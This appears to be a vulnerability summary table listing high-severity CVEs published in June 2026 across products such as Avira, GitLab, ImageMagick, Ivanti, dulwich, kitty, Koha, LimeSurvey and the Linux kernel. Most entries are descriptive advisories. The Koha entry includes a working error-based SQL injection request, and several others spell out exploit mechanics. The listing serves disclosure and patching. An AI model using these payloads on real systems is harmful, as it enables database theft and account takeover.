| Gen Digital--Avast Antivirus | Heap out-of-bounds read vulnerability in Avast Antivirus when scanning a malformed zip file containing XML may allow Local Execution of Code or Denial-of-Service of the antivirus process. This issue affects Avast Antivirus, AVG Antivirus, Norton Antivirus, Avast One, and Avast Business Antivirus on Windows, macOS, and Linux for virus definition builds from 25020100 before 25021208. The affected scanning logic is delivered through a shared Gen Digital virus definition update stream. The same stream feeds the consumer antivirus products listed in this advisory and other Gen Digital products that embed the same engine. Mitigation flows through this update channel; installations at or above the listed build are not vulnerable regardless of which product consumes the stream. | 2026-06-12 | 7.8 | CVE-2025-7011 |
| Gen Digital--Avira Antivirus | Heap buffer out-of-bounds write vulnerability due to integer overflow in Avira Antivirus engine when scanning a malformed MS-DOS executable file may allow Local Execution of Code or Denial-of-Service of the antivirus engine process. This issue affects Avira Antivirus on Windows, macOS, and Linux for engine builds before 8.3.70.104. | 2026-06-12 | 7.8 | CVE-2025-14098 |
| Gen Digital--Avira Antivirus | Heap buffer out-of-bounds read vulnerability in Avira Antivirus engine when scanning a malformed PDF file may allow Local Execution of Code or Denial-of-Service of the antivirus engine process. This issue affects Avira Antivirus on Windows, macOS, and Linux for engine builds before 8.3.70.68. | 2026-06-12 | 7.8 | CVE-2025-7002 |
| Gen Digital--Avira Antivirus | Heap buffer out-of-bounds read vulnerability in Avira Antivirus engine when scanning a malformed PDF file may allow Local Execution of Code or Denial-of-Service of the antivirus engine process. This issue affects Avira Antivirus on Windows, macOS, and Linux for engine builds before 8.3.70.56. | 2026-06-12 | 7.8 | CVE-2025-7003 |
| Gen Digital--Avira Antivirus | Heap buffer out-of-bounds read vulnerability in Avira Antivirus engine when scanning a malformed Windows MSI file may allow Local Execution of Code or Denial-of-Service of the antivirus engine process. This issue affects Avira Antivirus on Windows, macOS, and Linux for engine builds before 8.3.70.56. | 2026-06-12 | 7.8 | CVE-2025-7017 |
| Gen Digital--Avira Antivirus | Heap buffer out-of-bounds read vulnerability in Avira Antivirus engine when scanning a malformed Windows PE file may allow Local Execution of Code or Denial-of-Service of the antivirus engine process. This issue affects Avira Antivirus on Windows, macOS, and Linux for engine builds before 8.3.70.98. | 2026-06-12 | 7.8 | CVE-2025-9032 |
| Gen Digital--Avira Antivirus | Heap buffer out-of-bounds read vulnerability in Avira Antivirus engine when scanning a malformed PDF file may allow Local Execution of Code or Denial-of-Service of the antivirus engine process. This issue affects Avira Antivirus on Windows, macOS, and Linux for engine builds before 8.3.70.76. | 2026-06-12 | 7.8 | CVE-2025-9033 |
| Gen Digital--Avira Antivirus | Heap buffer out-of-bounds write vulnerability in Avira Antivirus engine when scanning a malformed POSIX tar archive may allow Local Execution of Code or Denial-of-Service of the antivirus engine process. This issue affects Avira Antivirus on Windows, macOS, and Linux for engine builds before 8.3.27.12. | 2026-06-12 | 7.8 | CVE-2026-6676 |
| Gen Digital--Avira Password Manager | Information disclosure vulnerability in Avira Password Manager when used with Mozilla Firefox may allow a remote attacker operating a cross-origin iframe to obtain credentials autofilled for the parent web page via incorrect autofill field selection. This issue affects Avira Password Manager when used with Mozilla Firefox on Windows, macOS, and Linux. | 2026-06-12 | 7.4 | CVE-2026-12068 |
| GitLab--GitLab | GitLab has remediated an issue in GitLab EE affecting all versions from 17.1 before 18.10.8, 18.11 before 18.11.5, and 19.0 before 19.0.2 that under certain conditions could have allowed an authenticated user with developer-role permissions to execute arbitrary client-side code on behalf of a targeted user due to improper input sanitization in the Analytics Dashboard. | 2026-06-11 | 8.7 | CVE-2026-10087 |
| GitLab--GitLab | GitLab has remediated an issue in GitLab EE affecting all versions from 15.5 before 18.10.8, 18.11 before 18.11.5, and 19.0 before 19.0.2 that under certain conditions could have allowed an authenticated user with group Owner role to take over another group member's GitLab account due to improper authorization in the Group SAML identity management functionality. | 2026-06-11 | 8.7 | CVE-2026-6552 |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 12.10 before 18.10.8, 18.11 before 18.11.5, and 19.0 before 19.0.2 that under certain conditions could have allowed an unauthenticated user to cause denial of service due to improper input validation in the API request parsing middleware. | 2026-06-11 | 7.5 | CVE-2026-7250 |
| GitLab--GitLab | GitLab has remediated an issue in GitLab EE affecting all versions from 13.1.4 before 18.10.8, 18.11 before 18.11.5, and 19.0 before 19.0.2 that under certain conditions could have allowed an authenticated user to add unauthorized email addresses to a targeted user's account due to improper sanitization of user-supplied input in certain group setting fields. | 2026-06-11 | 7.3 | CVE-2026-8589 |
| GL.iNet--GL-MT3000 | A weakness has been identified in GL.iNet GL-MT3000 up to 4.4.5. Affected is the function replace_country in the library /usr/lib/oui-httpd/rpc/tor of the component Tor Proxy Service Configuration Handler. This manipulation causes command injection. The attack can be initiated remotely. The exploit has been made available to the public and could be used for attacks. Upgrading to version 4.7 is able to address this issue. It is recommended to upgrade the affected component. The vendor was contacted early, responded in a very professional manner and quickly released a fixed version of the affected product. | 2026-06-14 | 8.8 | CVE-2026-12186 |
| GL.iNet--GL-MT3000 | A security vulnerability has been detected in GL.iNet GL-MT3000 up to 4.4.5. Affected by this vulnerability is an unknown functionality of the file /usr/bin/one_click_upgrade of the component Online Firmware Upgrade Handler. Such manipulation leads to command injection. The attack can be launched remotely. The exploit has been disclosed publicly and may be used. Upgrading to version 4.7 addresses this issue. Upgrading the affected component is advised. The vendor was contacted early, responded in a very professional manner and quickly released a fixed version of the affected product. | 2026-06-14 | 8.8 | CVE-2026-12187 |
| Global IT Informatics Services Inc.--WEOLL | Unrestricted upload of file with dangerous type vulnerability in Global IT Informatics Services Inc. WEOLL allows Accessing Functionality Not Properly Constrained by ACLs. This issue affects WEOLL: from 2.0.9 before 3.2.45.33. | 2026-06-12 | 8.7 | CVE-2026-6211 |
| grokability--snipe-it | Snipe-IT is an IT asset/license management system. A vulnerability in versions prior to 8.6.0 allows a non-admin user holding only the granular `users.edit` permission to lock every admin out of the instance by editing the `activated` flag (which determines whether or not a user can login) and the `ldap_import` flag, which determines whether or not the user can request a password reset. Version 8.6.0 contains a patch. | 2026-06-08 | 7.1 | CVE-2026-48507 |
| Hippoo--Hippoo Mobile App for WooCommerce | Incorrect Privilege Assignment vulnerability in Hippoo Mobile App for WooCommerce allows Privilege Escalation. This issue affects Hippoo Mobile App for WooCommerce: from n/a through 1.9.4. | 2026-06-11 | 9.8 | CVE-2026-49060 |
| IBM--i | IBM i 7.6, 7.5, 7.4, and 7.3 could allow a user to gain elevated privileges due to an unqualified library call. A malicious actor could cause user-controlled code to run with administrator privilege. | 2026-06-11 | 8.8 | CVE-2026-7870 |
| IBM--Langflow OSS | IBM Langflow OSS 1.0.0 through 1.9.1 could allow an authenticated user to read or modify sensitive information by bypassing authentication using insecure direct object references. | 2026-06-11 | 7.5 | CVE-2026-7787 |
| IBM--Qiskit SDK | IBM Qiskit SDK 0.43.0 through 2.5.0 could allow an attacker to trigger a segmentation fault leading to a denial of service due to uncontrolled recursion in the parser. | 2026-06-12 | 7.5 | CVE-2026-4870 |
| IEI Integration Corp--iRM-TSi410X | The iRM-IEI Remote Management developed by IEI Integration Corp has a Hardcoded Credentials vulnerability, allowing unauthenticated remote attackers to exploit hard-coded credentials to gain administrative privileges on the database. | 2026-06-12 | 9.8 | CVE-2026-11849 |
| IEI Integration Corp--iVEC TANK-XM811 | The iVEC-IEI Virtualization Edge Computer developed by IEI Integration Corp has an Arbitrary File Deletion vulnerability, allowing authenticated remote attackers to exploit this vulnerability to delete arbitrary system files or directories, resulting in data destruction or service disruption. | 2026-06-12 | 8.1 | CVE-2026-11846 |
| IEI Integration Corp--iVEC TANK-XM811 | The iVEC-IEI Virtualization Edge Computer developed by IEI Integration Corp has an OS Command Injection vulnerability, allowing privileged remote attackers to inject arbitrary OS commands and execute them on the device. | 2026-06-12 | 7.2 | CVE-2026-11845 |
| image-size--image-size | image-size through 2.0.2 contains a denial of service vulnerability that allows remote attackers to permanently block the Node.js event loop by supplying a specially crafted image buffer with a zero-valued size field in a recognized box-type. Attackers can trigger an infinite loop in the JXL or HEIF image parsers by providing a crafted image containing a box with a size of zero, causing the offset to never advance and permanently hanging the application. | 2026-06-09 | 7.5 | CVE-2025-71319 |
| image-size--image-size | image-size through 2.0.2 contains a denial of service vulnerability that allows remote attackers to permanently block the Node.js event loop by supplying a specially crafted image buffer with a zero-valued size field in a recognized box-type. Attackers can trigger an infinite loop in the JXL or HEIF image parsers by providing a crafted image containing a box with a size of zero, causing the offset to never advance and permanently hanging the application. | 2026-06-10 | 7.5 | CVE-2025-71329 |
| image-size--image-size | image-size through 2.0.2 contains a denial of service vulnerability that allows remote attackers to permanently block the Node.js event loop by supplying a specially crafted ICNS image buffer. Attackers can craft an ICNS buffer containing valid magic bytes and a zero-valued entry length field to trigger an infinite loop in the ICNS parser, as the offset is never incremented when the entry length field is 0, causing the while loop condition to remain true indefinitely. | 2026-06-10 | 7.5 | CVE-2025-71330 |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 6.9.13-48 and 7.1.2-23, when reading multiple images with different dimensions an out of bounds heap write can occur. This issue has been patched in versions 6.9.13-48 and 7.1.2-23. | 2026-06-10 | 7.5 | CVE-2026-46520 |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 7.1.2.23 and 6.9.13-48, due to a missing check in the MIFF decoder, a crafted file could cause an infinite loop resulting in CPU exhaustion. Versions 7.1.2.23 and 6.9.13-48 fix the issue. | 2026-06-10 | 7.5 | CVE-2026-46522 |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 6.9.13-48 and 7.1.2-24, a missing check in the DCM decoder could result in an image with invalid dimensions, which could cause crashes in other operations. This issue has been patched in versions 6.9.13-48 and 7.1.2-24. | 2026-06-10 | 7.5 | CVE-2026-49218 |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 6.9.13-50 and 7.1.2-25, a missing check for the maximum memory request in AcquireAlignedMemory could trigger an out-of-memory condition. This issue has been patched in versions 6.9.13-50 and 7.1.2-25. | 2026-06-10 | 7.5 | CVE-2026-53460 |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 6.9.13-50 and 7.1.2-25, an incorrect loop in the ICON decoder can result in an out of bounds heap write resulting in a crash. This issue has been patched in versions 6.9.13-50 and 7.1.2-25. | 2026-06-10 | 7.5 | CVE-2026-53461 |
| imvks786--student_management_system | A vulnerability was identified in imvks786 student_management_system up to 9599b560ad3c3b83e75d328b76bedcd489ef1f46. This affects an unknown function of the file /index.ph of the component Login. Such manipulation of the argument usr/pwd leads to sql injection. The attack can be executed remotely. The exploit is publicly available and might be used. This product implements a rolling release for ongoing delivery, which means version information for affected or updated releases is unavailable. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-08 | 7.3 | CVE-2026-11530 |
| imvks786--student_management_system | A security flaw has been discovered in imvks786 student_management_system up to 9599b560ad3c3b83e75d328b76bedcd489ef1f46. This impacts an unknown function of the file admin/admin_login.php of the component Administrator Login Endpoint. Performing a manipulation of the argument a_usr/a_pwd results in sql injection. The attack is possible to be carried out remotely. The exploit has been released to the public and may be used for attacks. This product adopts a rolling release strategy to maintain continuous delivery. Therefore, version details for affected or updated releases cannot be specified. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-08 | 7.3 | CVE-2026-11531 |
| Inisev--Copy & Delete Posts | Copy & Delete Posts through 1.5.4 lets any plugin-enabled non-admin role invoke every operation in the cdp_action_handling AJAX handler. Attackers with an enabled role can delete posts or overwrite plugin settings via the f parameter, bypassing per-function capability checks. | 2026-06-10 | 8.1 | CVE-2026-53738 |
| InternLM--lmdeploy | LMDeploy is a toolkit for compressing, deploying, and serving large language models. In versions 0.12.3 and prior, LMDeploy is vulnerable to arbitrary code execution through hardcoded "trust_remote_code=True" in multiple HuggingFace model-loading call sites. At time of publication, there are no publicly available patches. | 2026-06-09 | 7.8 | CVE-2026-46432 |
| InternLM--lmdeploy | LMDeploy is a toolkit for compressing, deploying, and serving large language models. In versions 0.12.3 and prior, hardcoded "trust_remote_code=True" enables HF supply-chain RCE without user opt-in. At time of publication, there are no publicly available patches. | 2026-06-09 | 7.8 | CVE-2026-46517 |
| iova.mihai--SliceWP | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in iova.Mihai SliceWP allows Stored XSS. This issue affects SliceWP: from n/a through 1.2.6. | 2026-06-11 | 7.1 | CVE-2026-42653 |
| Ivanti--Endpoint Manager Mobile | An OS command injection vulnerability in Ivanti EPMM versions before 12.9.0.1, 12.8.0.3 and 12.7.0.2 allows a remote authenticated attacker to execute arbitrary commands as root. | 2026-06-09 | 7.2 | CVE-2026-10727 |
| ivanti--Sentry | An OS Command Injection vulnerability in Ivanti Sentry versions before R10.5.2, R10.6.2 and R10.7.1 allows a remote unauthenticated user to achieve root-level remote code execution. | 2026-06-09 | 10 | CVE-2026-10520 |
| ivanti--Sentry | An Authentication Bypass vulnerability (CWE-288) in Ivanti Sentry versions before R10.5.2, R10.6.2 and R10.7.1 allows a remote unauthenticated attacker to create arbitrary administrative accounts and obtain full administrative access. | 2026-06-09 | 9.9 | CVE-2026-10523 |
| jelmer--dulwich | Dulwich is a pure-Python implementation of the Git file formats and protocols. Versions starting with 0.10.0 and prior to 1.2.5 have an arbitrary file write leading to remote code execution when cloning or checking out a malicious Git repository on Windows. Dulwich's path-element validator accepted tree entries whose filenames contained bytes that Windows interprets as structural path syntax. Contributing configuration bugs made matters worse. The core.protectNTFS and core.protectHFS settings were looked up under a wrong option name and so user-set values were silently ignored, and core.protectNTFS only defaulted to true on Windows (Git upstream has defaulted it to true everywhere since CVE-2019-1353). Both have been corrected. Anyone who clones, fetches, or checks out an untrusted repository with Dulwich on Windows - either through the Dulwich CLI, porcelain.clone, or any downstream tool built on Dulwich - is impacted. POSIX clones are not directly exploitable (on POSIX \ is a literal filename byte), but a POSIX user can unknowingly propagate a malicious tree to Windows consumers via push or re-publication. This issue is fixed in Dulwich 1.2.5. Users should upgrade to 1.2.5 or later. There is no effective pre-patch workaround. On affected versions the core.protectNTFS configuration key was silently ignored, so setting it to true does not mitigate the issue. Users who cannot upgrade should avoid cloning, fetching, or checking out untrusted repositories with Dulwich on Windows. After upgrading the NTFS validator is on by default on every platform, so no additional configuration is required. | 2026-06-10 | 8.8 | CVE-2026-42305 |
| jelmer--dulwich | Dulwich is a pure-Python implementation of the Git file formats and protocols. Starting in version 0.23.2 and prior to version 1.2.5, `dulwich.porcelain.submodule_update`, and by extension `porcelain.clone(..., recurse_submodules=True)`, materializes attacker-controlled submodule paths from a crafted upstream repository without path validation. A malicious `.gitmodules` plus a matching tree gitlink whose `path` is `.git/hooks` (or any other directory inside the parent repository's `.git` directory) causes the attacker's submodule tree contents to be written directly into the victim's `.git/hooks/` directory, preserving executable mode bits. The dropped executables are then run by any subsequent `git` or `dulwich` command that invokes the matching hook, resulting in arbitrary code execution. This is the dulwich equivalent of the upstream Git fixes for CVE-2024-32002 / CVE-2024-32004, which were never propagated into dulwich's separately implemented submodule porcelain. Version 1.2.5 patches the issue. | 2026-06-10 | 7.5 | CVE-2026-52726 |
| jmespath--jmespath.php | jmespath.php allows users to use JMESPath, software for declaratively specifying how to extract elements from a JSON document, in PHP applications with PHP data structures. Versions prior to 2.9.1 can generate and execute attacker-controlled PHP code when `JmesPath\CompilerRuntime` is used with an attacker-controlled JMESPath expression. The compiler emits parsed JMESPath function names into generated PHP source without sufficient escaping. A crafted expression can cause the generated cache file to contain executable attacker-controlled PHP, which is then loaded by the compiler runtime. The issue is patched in `2.9.1` and later. As a workaround, disable `JP_PHP_COMPILE` and do not use `JmesPath\CompilerRuntime` with attacker-controlled expressions. Use the default `AstRuntime` for untrusted expressions. Applications that must continue accepting untrusted JMESPath expressions before upgrading should ensure those expressions are never evaluated by the compiler runtime. | 2026-06-12 | 9.8 | CVE-2026-54133 |
| john-dagelmore--GPTranslate Multilingual AI Translation for WordPress: Automatically Translate Websites | The GPTranslate - Multilingual AI Translation for WordPress: Automatically Translate Websites plugin for WordPress is vulnerable to Stored Cross-Site Scripting via REST API Translation Storage in all versions up to, and including, 2.31 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The deterministically derived API key (sha256 of the site URL) is printed in the HTML source of every page via the JavaScript variable gptApiKey, meaning any unauthenticated visitor can retrieve the key and submit malicious translation payloads to the /wp-json/gptranslate/v1/request endpoint without any additional precondition. | 2026-06-13 | 7.2 | CVE-2026-9109 |
| js-cookie--js-cookie | JavaScript Cookie is a JavaScript API for handling cookies, client-side. Prior to version 3.0.7, js-cookie's internal assign() helper copies properties with for...in + plain assignment. When the source object is produced by JSON.parse, the JSON object's "__proto__" member is an own enumerable property, so the for-in enumerates it and the target[key] = source[key] write triggers the Object.prototype.__proto__ setter on the fresh target ({}). The result is a per-instance prototype hijack: Object.prototype itself is untouched, but the merged attributes object now inherits attacker-controlled keys. Because the consuming set() function then enumerates the merged object with another for...in, every key the attacker placed on the polluted prototype lands in the resulting Set-Cookie string as an attribute pair. The attacker can set domain=, secure=, samesite=, expires=, and path= on cookies whose attributes the developer thought were locked down. This issue has been patched in version 3.0.7. | 2026-06-10 | 7.5 | CVE-2026-46625 |
| koel--koel | Koel is a free, open-source music streaming solution. Prior to version 9.3.5, Koel validates the podcast feed URL via the SafeUrl rule (DNS resolution + public IP check), but the individual episode <enclosure url="..."> values extracted from the RSS XML are stored directly into the database without any SSRF validation. When a user plays an episode, the server downloads the full HTTP response from the unvalidated enclosure URL via Http::sink()->get() and streams it back to the user, enabling full-read SSRF against internal services. This issue has been patched in version 9.3.5. | 2026-06-12 | 7.7 | CVE-2026-47260 |
| Koha Community--Koha | SQL Injection in reports/catalogue_out.pl in Koha Community Koha through 22.11.37, 23.x, 24.x before 24.11.16, 25.05.x before 25.05.11, 25.11.x before 25.11.05, 26.05.x before 26.05.01, and 26.11.x before 26.11.00 allows an authenticated staff user with the Reports module flag to read arbitrary data from the Koha application database via the Filter URL parameter when the Criteria parameter matches /branchcode/. The vulnerable sink in sub calculate concatenates the unmodified Filter request parameter directly into a LIKE clause of the auxiliary $strsth2 statement and executes it via DBI without bound parameters: my $f = @$filters[0]; $f =~ s/\*/%/g; $strsth2 .= " AND $column LIKE '$f' "; This enables error-based SQL injection (e.g., via EXTRACTVALUE) and full read access to sensitive tables including borrowers (password hashes, 2FA secrets, PII), borrower_password_recovery, api_keys, and sessions. Proof of concept (error-based, single request): GET /cgi-bin/koha/reports/catalogue_out.pl?do_it=1&output=screen&Limit=10&Criteria=branchcode&Filter=x'+AND+EXTRACTVALUE(1,CONCAT(0x7e,VERSION(),0x7c,USER(),0x7c,DATABASE(),0x7e))--+- Cookie: CGISESSID=<LIBRARIAN_SESSION> The response body contains the DBI exception leaking the MariaDB version, database user, client IP, and database name, after which arbitrary data can be paged out using LIMIT n,1 / SUBSTRING(...). The vulnerable sink was introduced in commit 6bb77ae3e4 (2008-07-09); CVE-2015-4633 patched the same class in sibling files but did not generalise the fix to reports/catalogue_out.pl. Fixed in Koha 22.11.38, 24.11.16, 25.05.11, 25.11.05, 26.05.01, and 26.11.00 by replacing the raw concatenation with a parameterised placeholder. | 2026-06-13 | 7.6 | CVE-2026-6428 |
| kovidgoyal--kitty | Kitty is a cross-platform GPU-based terminal. In versions prior to 0.47.0, a program able to write bytes to a kitty terminal - a remote SSH peer, a downloaded file viewed with `cat`, a log line, an email body rendered in `less`, an issue body in a TUI, etc. - can cause kitty to execute attacker-supplied Python inside the running kitty process, with the user's full privileges. There is no approval prompt, no remote-control permission requirement, no shell-integration interaction, no clipboard touch, and no editor interaction. Version 0.47.0 fixes the issue. | 2026-06-12 | 7.8 | CVE-2026-42851 |
| kovidgoyal--kitty | Kitty is a cross-platform GPU-based terminal. In versions 0.47.0 and 0.47.1, `kitten dnd` can allow a malicious remote drag-and-drop source to overwrite or truncate arbitrary files writable by the local kitty user. Remote `text/uri-list` drops are staged in a temporary directory, but on case-sensitive filesystems duplicate remote basenames are not de-duplicated. An attacker can first create a staged symlink and then send a same-name regular-file entry. The regular-file write uses `utils.CreateAt()` / `openat(O_RDWR|O_CREAT|O_TRUNC)` without `O_NOFOLLOW`, so it follows the attacker-created symlink and writes outside the staging directory before final overwrite confirmation runs. This appears related in class to the file-transfer symlink advisory, but it is a different bug: it affects `kitten dnd` remote drag-and-drop staging, uses different vulnerable code (`kittens/dnd/drop.go` and `tools/utils/file_at_fd.go`), and reproduces on commit `4aa4a5c0567a92553a8c20a88a4352da637fca5d`, after the file-transfer `O_NOFOLLOW` fix. Version 0.47.2 patches the issue. | 2026-06-12 | 7.6 | CVE-2026-54056 |
| Kushan2k--student-management-system | A security flaw has been discovered in Kushan2k student-management-system up to f16a4ceaddd6729c4b306ed4641cda3176c1ef2a. Affected is an unknown function of the file service/RegisterService.php of the component Registration Endpoint. Performing a manipulation of the argument stimg results in unrestricted upload. The attack may be initiated remotely. The exploit has been released to the public and may be used for attacks. This product uses a rolling release model to deliver continuous updates. As a result, specific version information for affected or updated releases is not available. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-08 | 7.3 | CVE-2026-11474 |
| ladela--Online Scheduling and Appointment Booking System Bookly | The Online Scheduling and Appointment Booking System - Bookly plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'bookly-customer-full-name' cookie in versions up to, and including, 27.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Exploitation requires the 'Remember personal information in cookies' setting to be enabled (it is disabled by default). | 2026-06-13 | 7.2 | CVE-2026-5513 |
| Lenovo--Accessories and Display Manager for Enterprise | During an internal security assessment, a potential vulnerability was discovered in Lenovo Accessories and Display Manager for Enterprise for Windows that could allow a local authenticated user to execute arbitrary code with elevated privileges. | 2026-06-10 | 7.8 | CVE-2026-9045 |
| Lenovo--LanSchool Classic | A potential uncontrolled search path vulnerability was reported in the LanSchool Classic client application that could allow a local authenticated user to execute arbitrary code with elevated privileges. | 2026-06-10 | 7.8 | CVE-2026-8637 |
| Lenovo--Smart Connect | A potential authentication bypass was reported in Lenovo Smart Connect for Windows that could allow a local authenticated user to execute arbitrary code with elevated privileges. | 2026-06-10 | 7 | CVE-2026-6090 |
| LiamBindle--MQTT-C | LiamBindle MQTT-C through version 1.1.6 contains a heap-based out-of-bounds read and integer underflow in the mqtt_unpack_publish_response() function in src/mqtt.c that allows a remote unauthenticated attacker controlling an MQTT broker - or able to inject MQTT traffic into an unencrypted session - to crash a subscribed MQTT-C client and potentially disclose adjacent heap memory by sending a single crafted PUBLISH packet. The function validates only that the fixed-header remaining_length is at least 4, then reads the 16-bit topic_name_size field from the broker-controlled packet and advances the parse pointer by that value without verifying that topic_name_size plus the surrounding overhead fits within remaining_length; it subsequently computes application_message_size as remaining_length - topic_name_size - 2 (QoS 0) or - 4 (QoS greater than 0) in unsigned arithmetic, producing an integer underflow that is then passed to memmove(). A PUBLISH packet with topic_name_size = 0xFFFF and remaining_length = 7 advances the parse pointer 65535 bytes past the receive buffer (out-of-bounds read) and causes an application_message_size near 2^32, crashing the process when the resulting memmove() is executed. | 2026-06-14 | 8.2 | CVE-2026-54412 |
| libp2p--js-libp2p | libp2p is a JavaScript implementation of the libp2p networking stack. Prior to version 16.2.6, an unauthenticated remote peer can exhaust the disk storage of any @libp2p/kad-dht node running in server mode by sending an unbounded stream of PUT_VALUE messages whose keys bypass all content validation. No credentials, no prior relationship, and no protocol deviation beyond a crafted key are required. The victim node's datastore fills until the host disk is exhausted, making the node unavailable. This issue has been patched in version 16.2.6. | 2026-06-10 | 7.5 | CVE-2026-45783 |
| libp2p--js-libp2p | libp2p is a JavaScript implementation of the libp2p networking stack. Prior to version 15.0.23, three cooperating omissions in @libp2p/gossipsub allow an unauthenticated single peer to exhaust the Node.js heap of any gossipsub node with default options. This issue has been patched in version 15.0.23. | 2026-06-10 | 7.5 | CVE-2026-46679 |
| Limatek System Inc.--LimRAD NAC | Unrestricted upload of file with dangerous type vulnerability in Limatek System Inc. LimRAD NAC allows Remote Code Inclusion. This issue affects LimRAD NAC: before 5.5.7.3.9. | 2026-06-11 | 9.8 | CVE-2026-7852 |
| LimeSurvey--LimeSurvey | LimeSurvey constructs account password-reset links from the client-supplied HTTP Host header without validating it. The optional allowedHosts allowlist that would constrain this is undefined in the default (and documented) configuration, so LSHttpRequest::checkIsAllowedHost() results in no operation. A remote, unauthenticated attacker who submits a forgotten-password request for a known account (requiring only the target's username and email) with a spoofed Host header causes LimeSurvey to email that account a reset link whose hostname is attacker-controlled while embedding the genuine validation_key. When the recipient or an automated inbound mail-security link scanner dereferences the link, the valid reset token is disclosed to the attacker, who replays it against the legitimate host's newPassword endpoint to set a new password and take over the account. | 2026-06-09 | 8.8 | CVE-2026-50635 |
| LimeSurvey--LimeSurvey | The RemoteControl API methods invite_participants and remind_participants pass a caller-supplied token-ID array into TokenDynamic::findUninvited(), which concatenates the values directly into a tid IN ('...') SQL clause without parameterization or input validation. A remote, authenticated attacker holding the tokens/update permission on a survey can inject a crafted array element to perform SQL injection. Because LimeSurvey configures its PDO connection with emulated prepared statements (emulatePrepare = true) and does not disable MySQL multi-statements, the injection supports stacked queries: the attacker can append arbitrary additional statements (INSERT/UPDATE/DELETE/DROP/CREATE) after the original SELECT. This permits both arbitrary read of any data in the database, such as administrator bcrypt password hashes (lime_users), survey response PII, session records, and global settings, all recoverable via a SLEEP() time-based blind oracle, and arbitrary write/destruction of that data, including directly overwriting the administrator password hash for immediate account takeover or dropping/truncating tables. Reads and writes extend to any schema the application's database user can access. The RemoteControl interface (RPCInterface = json/xml) must be enabled, which is not the default. | 2026-06-09 | 8.8 | CVE-2026-50636 |
| lingdojo--kana-dojo | KanaDojo before 0.1.18 contains a sandbox escape vulnerability that allows an attacker to execute arbitrary code by exploiting the explicit passing of the global require function into a Node.js vm.runInNewContext() sandbox context in the issue-auto-respond.yml workflow. Attackers can submit a pull request modifying messages.cjs to import arbitrary Node.js modules, bypassing sandbox restrictions and achieving remote code execution with full GitHub Actions runner privileges including access to AUTOMATION_PR_TOKEN. | 2026-06-11 | 7.3 | CVE-2026-48546 |
| lingdojo--kana-dojo | KanaDojo contains a command injection vulnerability that allows an attacker with pull request access to execute arbitrary shell commands by inserting shell metacharacters into the version or changes fields of patchNotesData.json, which are interpolated unsanitized into a child_process.execSync() call in the release.yml workflow. Attackers can have a malicious pull request merged to trigger the GitHub Actions runner with contents write permissions and access to GITHUB_TOKEN. | 2026-06-11 | 7.3 | CVE-2026-48547 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: lib/scatterlist: fix length calculations in extract_kvec_to_sg Patch series "Fix bugs in extract_iter_to_sg()", v3. Fix bugs in the kvec and user variants of extract_iter_to_sg. This series is growing due to useful remarks made by sashiko.dev. The main bugs are: - The length for an sglist entry when extracting from a kvec can exceed the number of bytes in the page. This is obviously not intended. - When extracting a user buffer the sglist is temporarily used as a scratch buffer for extracted page pointers. If the sglist already contains some elements this scratch buffer could overlap with existing entries in the sglist. The series adds test cases to the kunit_iov_iter test that demonstrate all of these bugs. Additionally, there is a memory leak fix for the test itself. The bugs were originally introduced into kernel v6.3 where the function lived in fs/netfs/iterator.c. It was later moved to lib/scatterlist.c in v6.5. Thus the actual fix is only marked for backports to v6.5+. This patch (of 5): When extracting from a kvec to a scatterlist, do not cross page boundaries. The required length was already calculated but not used as intended. Adjust the copied length if the loop runs out of sglist entries without extracting everything. While there, return immediately from extract_iter_to_sg if there are no sglist entries at all. A subsequent commit will add kunit test cases that demonstrate that the patch is necessary. | 2026-06-08 | 9.8 | CVE-2026-46289 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: KVM: arm64: vgic-its: Drop the translation cache reference only for the erased entry vgic_its_invalidate_cache() walks the per-ITS translation cache with xa_for_each() and drops the cache's reference on each entry with vgic_put_irq(). It puts the iterated pointer, though, rather than the value returned by xa_erase(). The function is called from contexts that do not exclude one another: the ITS command handlers hold its_lock, the GITS_CTLR write path holds cmd_lock, and the path that clears EnableLPIs in a redistributor's GICR_CTLR holds neither. Two or more of them can drain the same cache concurrently, and if each one observes the same entry, erases it and then puts it, the single reference the cache holds on that entry is dropped more than once. The entry can then be freed while an ITE still maps it. xa_erase() is atomic and returns the previous entry, so put only the entry that this context actually removed. The cache reference is then dropped exactly once per entry even when the invalidations run concurrently, and the behavior is unchanged when only one context runs. | 2026-06-09 | 9.3 | CVE-2026-46316 |
